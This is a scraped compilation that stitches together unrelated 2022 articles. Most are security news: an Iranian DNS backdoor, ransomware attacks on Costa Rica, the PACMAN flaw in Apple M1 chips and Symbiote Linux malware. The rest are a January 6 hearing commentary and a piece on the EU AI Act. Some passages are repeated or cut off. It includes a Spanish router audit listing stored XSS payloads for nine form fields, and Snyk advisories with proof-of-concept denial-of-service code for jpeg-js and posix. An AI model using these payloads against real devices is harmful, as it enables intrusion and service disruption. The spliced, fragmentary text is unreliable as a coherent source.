The Iranian state-sponsored threat actor tracked under the moniker Lyceum has turned to using a new custom .NET-based backdoor in recent campaigns directed against the Middle East.
"The new malware is a .NET based DNS Backdoor which is a customized version of the open source tool 'DIG.net,'" Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a report published last week.
"

The Iranian state-sponsored threat actor tracked under the moniker Lyceum has turned to using a new custom .NET-based backdoor in recent campaigns directed against the Middle East.

"The new malware is a .NET based DNS Backdoor which is a customized version of the open source tool 'DIG.net,'" Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a report published last week.

"The malware leverages a DNS attack technique called 'DNS Hijacking' in which an attacker-controlled DNS server manipulates the response of DNS queries and resolves them as per their malicious requirements."

DNS hijacking is a redirection attack in which DNS queries to genuine websites are intercepted to take an unsuspecting user to fraudulent pages under an adversary's control. Unlike cache poisoning, DNS hijacking targets the DNS record of the website on the nameserver, rather than a resolver's cache.

Lyceum, also known as Hexane, Spirlin, or Siamesekitten, is primarily known for its cyber attacks in the Middle East and Africa. Earlier this year, Slovak cybersecurity firm ESET tied its activities to another threat actor called OilRig (aka APT34).

The latest infection chain involves the use of a macro-laced Microsoft Document downloaded from a domain named "news-spot\[.\]live," impersonating a legitimate news report from Radio Free Europe/Radio Liberty about Iran's drone strikes in December 2021.

Enabling the macro results in the execution of a malicious code that drops the implant to the Windows Startup folder to establish persistence and ensure it automatically runs every time the system is restarted.

The .NET DNS backdoor, dubbed DnsSystem, is a reworked variant of the open-source DIG.net DNS resolver tool, enabling the Lyceum actor to parse DNS responses issued from the DNS server ("cyberclub\[.\]one") and carry out its nefarious goals.

In addition to abusing the DNS protocol for command-and-control (C2) communications to evade detection, the malware is equipped to upload and download arbitrary files to and from the remote server as well as execute malicious system commands remotely on the compromised host.

"APT threat actors are continuously evolving their tactics and malware to successfully carry out attacks against their targets," the researchers said. "Attackers continuously embrace new anti-analysis tricks to evade security solutions; re-packaging of malware makes static analysis even more challenging."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Iranian Hackers Spotted Using a new DNS Hijacking Malware in Recent Attacks

A pair of ransomware attacks crippled parts of the country—and rewrote the rules of cybercrime.

But the attack against the finance ministry was just the beginning. A timeline shared by Mora claims Conti attempted to breach different government organizations almost every day between April 18 and May 2. Local authorities, such as the Municipality of Buenos Aires, were targeted, as well as central government organizations, including the Ministry of Labor and Social Security. In some cases, Conti was successful; in others, it failed. Mora says the US, Spain, and private companies helped defend against Conti attacks, providing software and indicators of compromises related to the group. “That blocked Conti a lot,” he says. (In early May, the US posted a $10 million reward for information about Conti’s leadership.)

On May 8, Chaves started his four-year term as president and immediately declared a “national emergency” due to the ransomware attacks, calling the attackers “cyberterrorists.” Nine of the 27 targeted bodies were “very affected,” Chaves said on May 16. The MICIT, which is overseeing the response to the attacks, did not respond to questions about the progress of the recovery, despite originally offering to set up an interview.

“All the national institutions, they don’t have enough resources,” Robles says. During the recovery, he says, he has seen organizations running on legacy software, making it much harder to enable the services they provide. Some bodies, Robles says, “don’t even have a person working on cybersecurity.” Mora adds that the attacks show Latin American countries need to improve their cybersecurity resilience, introduce laws to make cyberattack reporting mandatory, and allocate more resources to protect public institutions.

But just as Costa Rica started getting a grip on the Conti attacks, another hammer blow struck. On May 31, the second attack started. The systems of the Costa Rican Social Security Fund (CCSS), which organizes health care, were taken offline, plunging the country into a new kind of disarray. This time the HIVE ransomware, which has some links to Conti, was blamed.

The attack had an immediate effect on people’s lives. Health care systems went offline and printers spewed out garbage, as first reported by security journalist Brian Krebs. Since then patients have complained of delays in getting treatment and the CCSS has warned parents whose children were undergoing surgery that they may have trouble locating their kids. The health service has also begun printing discontinued paper forms.

By June 3, CCSS had declared an “institutional emergency,” with local reports claiming that 759 of the 1,500 servers and 10,400 computers have been impacted. A spokesperson for CCSS says hospital and emergency services are now running normally and the efforts of its staff have maintained care. However, those seeking medical care have faced significant disruptions: 34,677 appointments have been rescheduled, as of June 6. (The figure is 7 percent of total appointments; the CCSS says 484,215 appointments have gone ahead.) Medical imaging, pharmacies, testing laboratories, and operating theaters are all facing some disruption.

The Death of Conti

There are questions about whether the two separate ransomware attacks against Costa Rica are linked. However, they come as the face of ransomware may be changing. In recent weeks, Russian-linked ransomware gangs have changed their tactics to avoid US sanctions and are fighting over their territory more than usual.

Conti first announced its attack on the finance ministry on its blog, where it publishes the names of its victims and, if they fail to pay its ransom, the files it has stolen from them. A person or group dubbing themselves unc1756—the “UNC” abbreviation is used by some security firms to indicate “uncategorized” attackers—used the blog to claim responsibility for the attack. The attacker demanded $10 million as a ransom payment, later upping the figure to $20 million. When no payment was made, they started uploading 672 GB of files to Conti’s website.

Conti's Attack Against Costa Rica Sparks a New Ransomware Era

A vulnerability was found in Thomson TCW710 ST5D.10.05. It has been declared as problematic. This vulnerability affects unknown code of the file /goform/RgUrlBlock.asp. The manipulation of the argument BasicParentalNewKeyword with the input ><script>alert(1)</script> as part of POST Request leads to cross site scripting (Persistent). The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

Este route SOHO era el que te instalaban cuando estaba ONO allà por el 2007. Es un router ya antiguo, sin un uso a nivel de empresas, pero sigue vendiendose en webs de segundamano, no sé si como objeto ya de colección antiguo. Como uno de tantos apartaos que tengo por casa a este se me ocurrio realizarlee una pequeña auditoria a su interfa web.

**Info del dispositivo**

*   Marca: Thomson
*   Modelo: TCW710
*   Hardware version: 5.0
*   Software version: ST5D.10.05

**Resumen**

Al ser un modelo antiguo encontré que todos los campos donde se podia introducir texto se podía realizar un xss injection que en este caso son persistentes.

**Artefactos encontrados**

**XSS Persistente 1**

El primer XSS persistente lo encontramos en la siguiente petición:

*   URL: /goform/wlanPrimaryNetwork
*   Tipo: POST

Parametro

Tipo

Valor

Inyectable

Payload

ServiceSetIdentifier

String

Sí

><script>alert(1)</script>

ClosedNetwork

bool

0

No

WpaPskAuth

bool

1

No

Wpa2PskAuth

bool

1

No

WpaEncryption

integer

3

No

WpaPreSharedKey

String

123456789qwerty

?

WpaReKeyInterval

integer

0

No

GenerateWepKey

bool

0

No

WepKeysGenerated

bool

0

No

commitwlanPrimaryNetwork

bool

1

No

**XSS Persistente 2 y 3**

El segundo y tercero XSS persistente lo encontramos en la siguiente petición:

*   URL: /goform/RGFirewallEL
*   Tipo: POST

Parametro

Tipo

Valor

Inyectable

Payload

EmailAddress

String

aaaa

Yes

><script>alert(1)</script>

SmtpServerName

String

aaaa

Yes

><script>alert(1)</script>

LogAction

bool

0

No

**XSS Persistente 4, 5 y 6**

El cuarto, quito y sexto XSS persistente lo encontramos en la siguiente petición:

*   URL: /goform/RgTime
*   Tipo: POST

Parametro

Tipo

Valor

Inyectable

Payload

TimeSntpDisable

Integer

2

No

TimeServer1

String

aaaa

Yes

><script>alert(1)</script>

TimeServer2

String

aaaa

Yes

><script>alert(1)</script>

TimeServer3

String

aaaa

Yes

><script>alert(1)</script>

TimeZoneOfsetHrs

Integer

0

No

TimeZoneOfsetMins

Integer

0

No

ResetSntpDefaults

bool

0

No

**XSS Persistente 7**

El septimo XSS persistente lo encontramos en la siguiente petición:

*   URL: /goform/RgDdns
*   Tipo: POST

Parametro

Tipo

Valor

Inyectable

Payload

DdnsService

bool

0

No

DdnsUserName

String

aaaa

No

DdnsPassword

String

aaaa

No

DdnsHostName

String

aaaa

Yes

><script>alert(1)</script>

**XSS Persistente 8**

El octavo XSS persistente lo encontramos en la siguiente petición:

*   URL: /goform/RgDhcp
*   Tipo: POST

Parametro

Tipo

Valor

Inyectable

Payload

WanConnectionType

Integer

2

No

PppUserName

String

aaaa

Yes

><script>alert(1)</script>

PppPassword

String

aaaa

No

Mtu

Integer

0

No

PptpL2tpServer

String

aaaa

No

SpoofedMacAddressMA0

String

00

No

SpoofedMacAddressMA1

String

00

No

SpoofedMacAddressMA2

String

00

No

SpoofedMacAddressMA3

String

00

No

SpoofedMacAddressMA4

String

00

No

SpoofedMacAddressMA5

String

00

No

**XSS Persistente 9**

El noveno XSS persistente lo encontramos en la siguiente petición:

*   URL: /goform/RgUrlBlock.asp
*   Tipo: POST

Parametro

Tipo

Valor

Inyectable

Payload

BasicParentalNewKeyword

String

aaaa

Yes

><script>alert(1)</script>

BasicPaentalKeywordAction

Integer

1

No

BasicParentalNewdomain

String

aaaa

No

BasicParetalDomainAction

Integer

0

No

CVE-2018-25039: Auditando router thomson tcw710 | Alquimista de sistemas

Plus: Russia rattles its cyber sword, a huge Facebook phishing operation is uncovered, feds take down the SSNDOB marketplace, and more.

How do you smuggle information into the USSR right under the nose of the KGB? Create your own encryption system, of course. That’s exactly what saxophonist and music professor Merryl Goldberg did during the 1980s. This week Goldberg revealed that she used musical notation to hide the names and addresses of activists and details of meetings on a rare trip to the Soviet Union. To do so, she cooked up her own encryption system. Each musical note and marking represented letters of the alphabet and helped disguise the sensitive information. When Soviet officers inspected the documents, no suspicions were raised.

Goldberg’s story was retold at the RSA Conference in San Francisco this week, where WIRED’s Lily Newman has been digging up stories. Also coming out of RSA: a warning that as ransomware becomes less profitable, attackers may turn to business email compromise (BEC) scams to make money—BEC attacks are already highly profitable.

Also this week, dark-web marketplace AlphaBay is about to complete its journey back to the top of the online underworld. The original AlphaBay site—home to more than 350,000 product listings, ranging from drugs to cybercrime services—was purged from the dark web in July 2017 as part of a huge law enforcement operation. However, AlphaBay’s second-in-command, an actor going by the name of DeSnake, survived the law enforcement operation and relaunched the site last year. Now AlphaBay is growing quickly and is on the verge of resuming its dominant dark-web market position.

Elsewhere, Apple held its annual Worldwide Developers Conference this week and revealed iOS 16, macOS Ventura and some new MacBooks—WIRED’s Gear team has you covered on everything Apple announced at WWDC. However, there are two standout new security features worth mentioning: Apple is replacing passwords with new cryptographic passkeys, and it’s introducing a safety check feature to help people in abusive relationships. Database firm MongoDB also held its own event this week, and while it might not have been as high-profile as WWDC, MongoDB’s new Queryable Encryption tool may be a key defense against preventing data leaks.

Also this week we’ve reported on a Tesla flaw that lets anyone create their own NFC car key. New research from the ​​Mozilla Foundation has found that disinformation and hate speech are flooding TikTok ahead of Kenya’s elections, which take place at the start of August. Elon Musk reportedly gained access to Twitter’s “fire hose,” raising privacy concerns. And we dove into the shocking new evidence televised by the House January 6 committee.

But that's not all, folks. Each week we round up the big security and privacy news we didn't cover ourselves. Click the links for the full stories, and stay safe out there.

For the past two years, state-sponsored hackers working on behalf of the Chinese government have targeted scores of communications technologies, ranging from home routers to large telecom networks. That’s according to the NSA, FBI, and the Cybersecurity and Infrastructure Security Agency (CISA), which published a security advisory this week detailing the “widespread” hacking.

Since 2020, Chinese-backed actors have been exploiting publicly known software flaws in hardware and incorporating compromised devices into their own attack infrastructure. According to the US agencies, the attacks typically contained five steps. China’s hackers would use publicly available tools to scan for vulnerabilities in networks. They would then gain initial access through online services, access login details from the systems, get access to routers and copy network traffic, before finally “exfiltrating” victim data.

“Exploiting these vulnerabilities has allowed them to establish broad infrastructure networks to exploit a wide range of public- and private-sector targets,” the agencies say in their joint advisory.

Since the start of the war in Ukraine, Russia has been hacked at an unprecedented scale. Now, more than 100 days into the war, tensions around cyber activity are rising. On June 9, Russia’s Foreign Ministry said that its critical infrastructure and government bodies were being hit by cyberattacks and warned that it could lead to military confrontation with the West. “The militarization of the information space by the West, and attempts to turn it into an arena of interstate confrontation, have greatly increased the threat of a direct military clash with unpredictable consequences,” the Foreign Ministry said in a statement. From the moment Russian troops entered Ukraine, questions have been raised about the potential for escalation if people outside of Ukraine are involved in cyberattacks against Russia. Last week, the head of US Cyber Command told _Sky News_ that its military hackers have been involved in offensive operations that support Ukraine.

Phishing remains one of the most successful ways for criminals to break into people’s accounts and make money—and there’s no better example of this than a newly uncovered Facebook and Facebook Messenger phishing campaign. This week, security researchers at US firm PIXM revealed a huge network of at least 400 phishing pages that are raking in millions of views and have made its creators an estimated $59 million. The scam, which has been running since at least September 2021, directs people to false Facebook login pages where their credentials are hoovered up. What stands out, as noted by the Register, is that the phishing campaign has managed to avoid Facebook’s phishing detection methods more effectively than others.

So far in 2022, police and tech companies have been cracking down on cybercriminals with some success: Raidforums, ZLoader, and the dark-web market Hydra have all been shut down in recent months. That list got a little bit longer this week as the FBI and its international law enforcement took down a marketplace selling the personal information of around 24 million Americans, according to authorities. The SSNDOB marketplace, which was made up of four individual domains, was selling people’s names, dates of birth, and Social Security numbers. SSNDOB has existed for around a decade, and in 2013, details obtained from the organization were used in the takeover of Xbox Live accounts. It’s believed the website has made its unknown owners around $22 million since 2015.

How China Hacked US Phone Networks

A novel hardware attack dubbed PACMAN has been demonstrated against Apple's M1 processor chipsets, potentially arming a malicious actor with the capability to gain arbitrary code execution on macOS systems.
It leverages "speculative execution attacks to bypass an important memory protection mechanism, ARM Pointer Authentication, a security feature that is used to enforce pointer integrity," MIT

A novel hardware attack dubbed **PACMAN** has been demonstrated against Apple's M1 processor chipsets, potentially arming a malicious actor with the capability to gain arbitrary code execution on macOS systems.

It leverages "speculative execution attacks to bypass an important memory protection mechanism, ARM Pointer Authentication, a security feature that is used to enforce pointer integrity," MIT researchers Joseph Ravichandran, Weon Taek Na, Jay Lang, and Mengjia Yan said in a new paper.

What's more concerning is that "while the hardware mechanisms used by PACMAN cannot be patched with software features, memory corruption bugs can be," the researchers added.

The vulnerability is rooted in pointer authentication codes (PACs), a line of defense introduced in arm64e architecture that aims to detect and secure against unexpected changes to pointers — objects that store a memory address — in memory.

PACs aim to solve a common problem in software security, such as memory corruption vulnerabilities, which are often exploited by overwriting control data in memory (i.e., pointers) to redirect code execution to an arbitrary location controlled by the attacker.

While strategies like Address Space Layout Randomization (ASLR) have been devised to increase the difficulty of performing buffer overflow attacks, the goal of PACs is to ascertain the "validity of pointers with minimal size and performance impact," effectively preventing an adversary from creating valid pointers for use in an exploit.

This is achieved by protecting a pointer with a cryptographic hash — called a Pointer Authentication Code (PAC) — to ensure its integrity. Apple explains PACs as follows -

_Pointer authentication works by offering a special CPU instruction to add a cryptographic signature — or PAC — to unused high-order bits of a pointer before storing the pointer. Another instruction removes and authenticates the signature after reading the pointer back from memory. Any change to the stored value between the write and the read invalidates the signature. The CPU interprets authentication failure as memory corruption and sets a high-order bit in the pointer, making the pointer invalid and causing the app to crash._

But PACMAN "removes the primary barrier to conducting control-flow hijacking attacks on a platform protected using pointer authentication." It combines memory corruption and speculative execution to circumvent the security feature, leaking "PAC verification results via microarchitectural side channels without causing any crashes."

The attack method, in a nutshell, makes it possible to distinguish between a correct PAC and incorrect hash, permitting a bad actor to "brute-force the correct PAC value while suppressing crashes and construct a control-flow hijacking attack on a PA-enabled victim program or operating system."

The crash prevention, for its part, succeeds because each PAC value is speculatively guessed by exploiting a timing-based side channel via the translation look-aside buffer (TLB) using a Prime+Probe attack.

Speculative execution vulnerabilities, as observed in the case of Spectre and Meltdown, weaponize out-of-order execution, a technique that's used to bring about a performance improvement in modern microprocessors by predicting the most likely path of a program's execution flow.

However, it's worth noting that the threat model presumes that there already exists an exploitable memory corruption vulnerability in a victim program (kernel), which, in turn, allows the unprivileged attacker (a malicious app) to inject rogue code into certain memory locations in the victim process.

"This attack has important implications for designers looking to implement future processors featuring pointer authentication, and has broad implications for the security of future control-flow integrity primitives," the researchers concluded.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

MIT Researchers Discover New Flaw in Apple M1 CPUs That Can't Be Patched

The package jpeg-js before 0.4.4 are vulnerable to Denial of Service (DoS) where a particular piece of input will cause to enter an infinite loop and never return.




Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   **snyk-id**
    
    SNYK-JS-JPEGJS-2859218
    
*   **published**
    
    7 Jun 2022
    
*   **disclosed**
    
    6 Jun 2022
    
*   **credit**
    
    Sohom Datta
    

**How to fix?**

Upgrade jpeg-js to version 0.4.4 or higher.

**Overview**

Affected versions of this package are vulnerable to Denial of Service (DoS) where a particular piece of input will cause to enter an infinite loop and never return.

**PoC**

1.  Create a npm workspace npm init
2.  Install the jpeg-js library
3.  Create a JS file with the following code: \`\`\`js const jpeg = require('jpeg-js');

let buf = Buffer.from( 'ffd8ffc1f151d800ff51d800ffdaffde', 'hex' ); jpeg.decode( buf );

\`\`\` 4) Run the file and observe that the code never stops running

**Details**

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

*   High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
    
*   Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

CVE-2022-25851: Denial of Service (DoS) in jpeg-js | CVE-2022-25851 | Snyk

This affects all versions of package posix.
 When invoking the toString method, it will fallback to 0x0 value, as the value of toString  is not invokable (not a function), and then it will crash with type-check.



Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   **snyk-id**
    
    SNYK-JS-POSIX-2400719
    
*   **published**
    
    7 Jun 2022
    
*   **disclosed**
    
    14 Feb 2022
    
*   **credit**
    
    Snyk Research Team
    

**How to fix?**

There is no fixed version for posix.

**Overview**

posix is a missing POSIX system calls for Node.

Affected versions of this package are vulnerable to Denial of Service (DoS). When invoking the toString method, it will fallback to 0x0 value, as the value of toString is not invokable (not a function), and then it will crash with type-check.

**PoC**

    const posix = require('posix')
    
    try{
            console.log('[!] Trying invokation')
            posix.setegid({toString:1});
            console.log('[!] Made it!')
    }catch(e){
            console.log('[!] Excepted')
            console.error(e)
    }
    
    console.log("but we ok")
    

**Details**

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

*   High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
    
*   Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

CVE-2022-21211: Denial of Service (DoS) in posix | CVE-2022-21211 | Snyk

A Linux-based banking Trojan is a master at staying under the radar.

A stealthy Linux threat called Symbiote is targeting financial institutions in Latin America, with all file, processes, and network artifacts hidden by the malware, making it virtually invisible to detection by live forensics.

The malware was first uncovered in November, according to a blog post by BlackBerry Research. What sets Symbiote apart from other Linux malware is its approach to infecting running processes, rather than using a stand-alone executable file to inflict damage.

It then harvests credentials to provide remote access for the threat actor, exfiltrating credentials as well as storing them locally.

"It operates as a rootkit and hides its presence on the machine. Once it has infected the machine fully, it allows you to see only what it wants you to see," Joakim Kennedy, security researcher at Intezer and author of the BlackBerry blog post, explains. "Essentially, you can't trust what the machine is telling you."

However, it can be detected externally, he says, since it exfiltrates stolen credentials via the DNS requests.

Kennedy says the domain names the malware uses impersonate big banks in Brazil, which also helps it stay under the radar.

"While we couldn't tell based on only what we found, attackers targeting financial institutions are often motivated by potential monetary gain," he says.

**Shared Object Library**

Nicole Hoffman, senior cyber threat intelligence analyst at Digital Shadows, points out that unlike most malware variants, the Symbiote malware is a shared object library, instead of an executable file.

Symbiote uses the LD\_PRELOAD variable that allows it to be pre-loaded by applications before other shared object libraries.

"This is a sophisticated and evasive technique that can help the malware blend in with legitimate running processes and applications, which is one of the reasons Symbiote is difficult to detect," she says.

The malware also has Berkeley Packet Filter (BPF) hooking functionality. Packet capture tools intercept, or capture, network traffic typically for the purposes of an investigation.

BPF is a tool embedded within several Linux operating systems that allows users to filter out certain packets depending on the type of investigation they are performing, which can reduce the overall results, making analysis easier.

"The Symbiote malware is designed to essentially filter its traffic out of the packet capture results," Hoffman explains. "This is just another layer of stealth used by the attackers to cover their tracks and fly under the radar."

Kennedy adds that this is the first time the BPF hooking functionality has been observed operating in this way, and points out that other malware variants have typically used BPF to receive commands from their command-and-control server.

"This malware instead uses this method to hide network activity," he says. "It's an active measure used by the malware to prevent being detected if someone investigates the infected machine — like covering up its footsteps so it's harder to track down.”

**Easier to Attack?**

Mike Parkin, senior technical engineer at Vulcan Cyber, says there may be a perception on the attacker's part that the targets in Latin America have a less mature security infrastructure and would thus be easier to attack.

He explains that the attackers went out of their way to hide their malware from anything that's running on the infected system, leveraging BPF to hide their communications traffic.

"While this will work on the local host, other network-monitoring tools will be able to identify the hostile traffic and the infected source," he says.

He explains that there are several endpoint tools available that should identify changes on a victim system.

"There are also forensic techniques that can use the malware's own behavior against it to reveal its presence," he notes. "The authors who created Symbiote went to great lengths hide their malware. They leveraged a combination of techniques, though in so doing delivered some indicators of compromise that defenders could use to identify an infection in-situ."

Kennedy says that the most important action is to focus on the techniques used by this malware to ensure that you can detect and/or protect against those, whether you're protecting against Symbiote or another attack that uses the same technique.

"I would say Symbiote, and other recently discovered undetected Linux malware, shows that operating systems other than Windows are not immune to highly evasive malware," he says. "Since it doesn’t get as much attention as Windows malware, we don't know what else is out there that hasn’t been discovered yet."

Symbiote Malware Poses Stealthy, Linux-Based Threat to Financial Industry

The House committee's televised hearings interrogate the Capitol attack with damning new evidence. Whether it's enough to prevent another one is uncertain.

It’s hard to tell which fact should shock us most out of the first, surprisingly compelling public hearing of the congressional committee investigating the insurrection at the US Capitol on January 6.

Jared Kushner brushing aside as mere “whining” the repeated resignation threats from White House counsel and its top lawyers in the face of Donald Trump’s ongoing push to overturn the election?

The fact that even as rioters surged through the Capitol and members of Congress fled in terror, Donald Trump, the president of the United States, never once spoke to any corner of the US government to ask for help—never once called the Justice Department, Homeland Security, or the Pentagon?

The committee’s allegations that members of Congress sought presidential pardons for their own roles in the January 6 events?  

Or the simple power of a brave police officer talking about our nation’s most sacred democratic space as a “war zone” and how—repeatedly injured by the rioters that the GOP has sought in the last 18 months to reframe as “normal tourists” engaged in “legitimate political discourse”—she slipped on others’ blood spread across the steps of the US Capitol? 

After months of behind-the-scenes investigation, wide-ranging subpoenas, witness depositions, document reviews, countless hours of reviewing video footage, and delicate internal political machinations, the public portion of the House’s January 6 select committee kicked off Thursday night with a two-hour blockbuster that immediately established the stakes of the work—the former president of the United States attempted nothing less than a coup to remain in power—and recentered its work as one of the most important political investigations in our lifetime.

Committee vice-chair Rep. Liz Cheney, a Wyoming Republican who has been excoriated by her own party for agreeing to participate in the investigation alongside Republican Rep. Adam Kinzinger of Illinois, provided a captivating introduction and overview of the events of January 6, 2021. She also highlighted what the committee will explore over the course of roughly a half-dozen hearings this month and immediately gave the lie to GOP dismissals of the investigation as nothing more than a political witch hunt.

The skillful—and politically courageous—presentation by Cheney, followed up by multiple video segments produced by the committee, highlights the coordination among armed, white nationalist militia groups like the Proud Boys and Oath Keepers, as well as the singular role Donald Trump played in stoking lies that the election had been stolen and then inviting his supporters to come to Washington on January 6 to protest—protests that quickly escalated into a brutal, violent assault on the Capitol that had lawmakers fleeing for their lives. One of the most powerful video clips showed staffers of Republican leader Kevin McCarthy—who has long downplayed the Capitol assault—evacuating their House offices in terror. Other clips showed the crowd chanting, “Hang Mike Pence” and insurrectionists screaming in the face of police to demand that they hand over House speaker Nancy Pelosi. Cheney closed her poised and pointed presentation with a warning to the hundreds of her GOP colleagues who have excused the events of 1/6: “There will come a day when Donald Trump is gone, but your dishonor will remain.”

Committee chair Rep. Bennie Thompson, Democrat of Mississippi, outlined how future hearings would focus on the particulars of the conspiracy and the careful construction of Trump’s knowing lies—committee members explained that they saw in Trump’s behavior a “sophisticated” seven-step plan for overturning the election—but Thursday’s hearing mostly focused on reminding Americans of the stakes involved. This was no ordinary political protest. This was no ordinary election loss. The actions of Donald Trump before, during, and after the January 6 Capitol assault instead marked an end to America’s 240-year tradition of peaceful transitions of presidential power.

Instead, Donald Trump embarked on a concerted effort to use the tools of the presidency and the US government to overturn the legitimate, authentic election results—even though his own staff told him, according to their depositions aired Thursday in the hearing, that “there was no there there.”

First Trump lied to the public. Then he tried to weaponize the Justice Department to back his lies. He pressured state election officials and legislators to embrace far-fetched legal theories and change their states’ election results. His team worked to invent and send to Washington invalid slates of electors, in the hopes that Congress would recognize them and allow him to overturn his loss. He summoned supporters and encouraged armed groups to join him in DC on January 6, promising in a tweet that it “will be wild.” Then he pressured Vice President Mike Pence to violate his constitutional oath and refuse to certify the valid election results ahead of January 6. And lastly, he seemingly refused to lift a finger—either to place a telephone call or send a tweet—to summon federal aid as the Capitol and legislative branch remained under violent assault for hours. Instead, according to the committee, only Vice President Pence—himself hiding at a secure loading dock inside the Capitol complex after being hastily evacuated from the Senate chamber above—contacted the military and ordered them to respond and secure the Capitol.

Taken together, it is the most audacious, calculated, and unconstitutional plot America has faced in its history—one that came far closer to success than anyone imagined.

Over the course of those two hours, the committee succeeded in reframing the national conversation and focused on the true horror of January 6. In doing so, it surely raised the pressure on the Justice Department, which is conducting a seemingly slow-moving parallel investigation that has seen hundreds of low-level indictments and charges against January 6 rioters—including the arrest just yesterday of a GOP gubernatorial candidate in Michigan—and a number of more serious “seditious conspiracy” indictments against Oath Keepers and Proud Boys leaders. Thus far, it has stopped short of penetrating Donald Trump’s motley collection of enablers, grifters, and hangers-on.

Despite the shocking clarity of the committee’s opening presentation, it remains uncertain at best whether it will be able to break through America’s political polarization and its increasingly separate-and-unequal media ecosystems. Fox News, alone among the major networks, refused to air the hearings live and instead allowed its host Tucker Carlson, who increasingly features openly white nationalist positions, to spew venom to his millions of prime-time viewers during an hour-long show, unusually uninterrupted by commercials.

In many ways, Fox’s decision to double down on Tucker Carlson’s lies Thursday night is unsurprising. The network’s decision in the weeks after the 2020 election—as Donald Trump built up the Big Lie and set the kindling for January 6—to embrace Trump’s lies and undermine the legitimacy of then-President-elect Joe Biden’s victory makes it all but an unindicted co-conspirator in the violence on Capitol Hill.

The challenge America now faces, heading into next week’s follow-up hearings, is that none of us know what part of Donald Trump’s story we’re living in—the beginning, the middle, or the end? The committee’s work ahead is to convince America to view January 6 as a turning point, not a warning that we will later say went ignored.

There’s a saying, after all, that there’s no such thing as an unsuccessful coup. An unsuccessful coup is just practice.

The January 6 Hearing Was a Warning

The commission argues that legislative action is needed to ensure a well-functioning market for AI systems that balances benefits and risks.

The European Commission (EC) is currently debating new rules and actions for trust and accountability in artificial intelligence (AI) technology through a legal framework called the EU AI Act. Its aim is to promote the development and uptake of AI while addressing potential risks some AI systems can pose to safety and fundamental rights.

While most AI systems will pose low to no risk, the EU says, some create dangers that must be addressed. For example, the opacity of many algorithms may create uncertainty and hamper effective enforcement of existing safety and rights laws.

The EC argues that legislative action is needed to ensure a well-functioning internal market for AI systems where both benefits and risks are adequately addressed.

"The EU AI Act aims to be a human centric legal-ethical framework that intends to safeguard and protect human rights and fundamental freedoms from violations of these rights and freedoms by algorithms and smart machines," says Mauritz Kop, Transatlantic Technology Law Forum Fellow at Stanford Law School and strategic intellectual property lawyer at AIRecht.

The right to know whether you are dealing with a human or a machine — which is becoming increasingly more difficult as AI becomes more sophisticated — is part of that vision, he explains.

Kop notes that AI is now mostly unregulated, except for a few sector-specific rules. The act aims to address the legal gaps and loopholes by introducing a product safety regime for AI.

"The risks are too high for nonbinding self-regulation by companies alone," he says.

**Effects on AI Innovation**

Kop admits that regulatory conformity and legal compliance will be a burden, especially for early AI startups developing high-risk AI systems. Empirical research that shows the GDPR – while preserving privacy and data protection and data security – had a negative effect on innovation, he notes.

Risk classification for AI is based on the intended purpose of the system, in line with existing EU product safety legislation. Classification depends on the function the AI system performs and on the specific purpose and modalities for which the system is used.

"The legal uncertainty surrounding \[regulation\] and the lack of budget to hire specialized lawyers or multidisciplinary teams still are significant barriers for a flourishing AI startup and scale-up ecosystem," Kop says. "The question remains whether the AI Act will improve or worsen the startup climate in the EU."

The EC will determine which AI gets classified as "high risk" using criteria that are still under debate, creating a list of examples of high-risk systems to help guide judgment.

"It will be a dynamic list that contains various types of AI applications used in certain high-risk industries, which means the rules get stricter for riskier AI in healthcare and defense than they are for AI apps in tourism," Kop says. "For instance, medical AI is \[classified as\] high risk to prevent direct harm to patients due to AI errors."

He notes there is still controversy about the criteria and definition of AI that the draft uses. Some commentators argue it should be more technology-specific, aimed at certain riskier types of machine learning, such as deep unsupervised learning or deep reinforcement learning.

"Others focus more on the intent of the system, such as social credit scoring, instead of potential harmful results, such as neuro-influencing," Kop added. "A more detailed classification of what 'risk' entails would thus be welcome in the final version of the act."

**Facial Recognition as a High-Risk Technology**

Joseph Carson, chief security scientist and advisory CISO at Delinea, participated in several of the talks around the act, including as a subject matter expert in the use of AI in law enforcement and articulating the concerns around security and privacy.

The EU AI Act, he says, will mainly affect those organizations that already collect and process personal identifiable information. Therefore, it will impact how they use advanced algorithms in processing the data.

"It is important to understand the risks if no regulation or act is in place and what the possible impact \[is\] if organizations abuse the combination of sensitive data and algorithms," Carson says. "The future of the Internet is a scary place, and the enforcement of the EU AI Act allows us to embrace the future of the Internet using AI with both responsibility and accountability."

Regarding facial recognition, he says the technology should be regulated and controlled.

"It has many amazing uses in society, but it must be something you opt in and agree to use; citizens must have a choice," he says. "If no act is in place, we will see a significant increase in deepfakes that will spiral out of control."

